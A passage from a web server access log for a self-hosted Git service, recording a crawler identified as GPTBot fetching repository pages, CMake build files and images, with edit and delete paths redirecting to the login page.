74.7.227.38] [Length 211047] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:51:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=rendered" [Client 74.7.227.38] [Length 11013] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:51:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:19:51:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:19:51:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:19:51:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:19:51:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 10166] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:19:51:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 10333] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:19:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 10519] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:19:51:39 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:19:51:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:19:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" [Client 74.7.227.38] [Length 10847] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:19:51:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1" [Client 74.7.227.38] [Length 9844] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1" +[17/Feb/2026:19:51:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211047] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 2525271] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" +[17/Feb/2026:19:51:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.html" +[17/Feb/2026:19:51:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 74.7.227.38] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:19:51:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html?display=source" [Client 74.7.227.38] [Length 211045] [Gzip 18.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 9836] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:19:51:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake" +[17/Feb/2026:19:51:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake" +[17/Feb/2026:19:51:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake" +[17/Feb/2026:19:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake" +[17/Feb/2026:19:51:47 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake" +[17/Feb/2026:19:51:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake" +[17/Feb/2026:19:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14520] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:19:51:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 35980] [Gzip 10.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:19:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13827] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:19:51:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12988] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:19:51:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11818] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:19:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26576] [Gzip 11.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:19:51:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13881] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:19:51:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:19:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:19:51:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" [Client 74.7.227.38] [Length 11561] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode" +[17/Feb/2026:19:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake" [Client 74.7.227.38] [Length 9826] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake" +[17/Feb/2026:19:51:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:19:51:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:19:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 9880] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:51:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:51:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:51:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 14861] [Gzip 9.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:51:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:51:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 2101] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9895] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:51:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 991] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:51:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 22369] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:51:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:51:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:51:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:52:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1015] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:52:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" [Client 74.7.227.38] [Length 9885] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:52:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 